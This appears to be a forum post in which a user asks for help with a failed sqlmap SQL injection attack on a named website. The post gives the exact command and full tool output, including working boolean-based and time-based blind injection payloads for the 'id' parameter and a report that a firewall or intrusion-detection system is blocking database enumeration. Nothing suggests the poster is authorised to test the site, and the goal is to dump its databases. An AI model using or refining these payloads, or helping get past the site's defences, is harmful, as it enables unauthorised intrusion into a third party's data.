The site is h-ttp://www.benij.org/blog.php?id=1, friends. I want to do SQL injection and I am using sqlmap. The code I wrote:
sqlmap -u h-ttp://www.benij.org/blog.php?id=1 --dbs
Is there no SQL vulnerability on the site, I wonder? Could anyone who knows the cause of the error please write? I will keep the thread current for a while.
Output:
[12:28:56] [INFO] resuming back-end DBMS 'mysql'
[12:28:56] [INFO] testing connection to the target URL
[12:28:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9075=9075 AND 'hEPc'='hEPc
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'jQlp'='jQlp
---
[12:28:57] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[12:28:57] [INFO] fetching database names
[12:28:57] [INFO] fetching number of databases
[12:28:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:28:57] [INFO] retrieved:
[12:28:57] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[12:28:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:29:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:29:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:29:08] [ERROR] unable to retrieve the number of databases
[12:29:08] [INFO] falling back to current database
[12:29:08] [INFO] fetching current database
[12:29:08] [INFO] retrieved:
[12:29:09] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[12:29:21] [CRITICAL] unable to retrieve the database names
[12:29:21] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 42 times
[*] shutting down at 12:29:21